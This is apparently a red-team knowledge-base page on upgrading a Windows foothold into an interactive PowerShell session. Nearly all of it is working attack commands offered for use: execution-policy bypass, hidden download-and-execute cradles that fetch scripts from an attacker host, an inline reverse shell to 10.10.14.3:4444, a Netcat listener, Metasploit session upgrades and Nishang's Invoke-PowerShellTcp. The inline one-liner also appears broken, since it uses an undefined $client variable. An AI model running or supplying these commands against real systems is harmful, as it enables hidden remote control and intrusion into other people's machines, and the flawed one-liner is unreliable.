Operator On The Wire
Join
← Back to Knowledge Base
RED TEAM / SHELLS / UPGRADE

Windows

1. Manual PowerShell Spawn

If you have a working cmd.exe shell:

powershell -nop -exec bypass

That drops you into an interactive PowerShell prompt.

2. One-Liner PowerShell Reverse Shell (Stageless)

From a cmd shell, run:

powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<attacker>/rev.ps1')"

  • Host a reverse shell script (rev.ps1) on your attacker box.

  • On Kali:

    python3 -m http.server 80 nc -lvnp 4444

  • The PowerShell payload will connect back.

3. PowerShell Reverse Shell Inline One-Liner

Classic Nishang-style:

powershell -nop -exec bypass -c "New-Object System.Net.Sockets.TCPClient('10.10.14.3',4444);$s=$client.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne0){;$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1 | Out-String );$sb2=$sb+'PS '+(pwd).Path+'> ';$sbt=[text.encoding]::ASCII.GetBytes($sb2);$s.Write($sbt,0,$sbt.Length)}"

Replace 10.10.14.3 and 4444 with your attacker IP/port.

4. Metasploit Upgrade

If you caught the initial cmd shell in Metasploit:

sessions -u <id>

That will attempt to upgrade the shell into a Meterpreter session.
From there you can spawn PowerShell with:

load powershell powershell_shell

5. Use Invoke-PowerShellTcp.ps1 from Nishang

On your attacker box:

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

Host it with Python, then on the target:

powershell -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://<attacker>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 4444"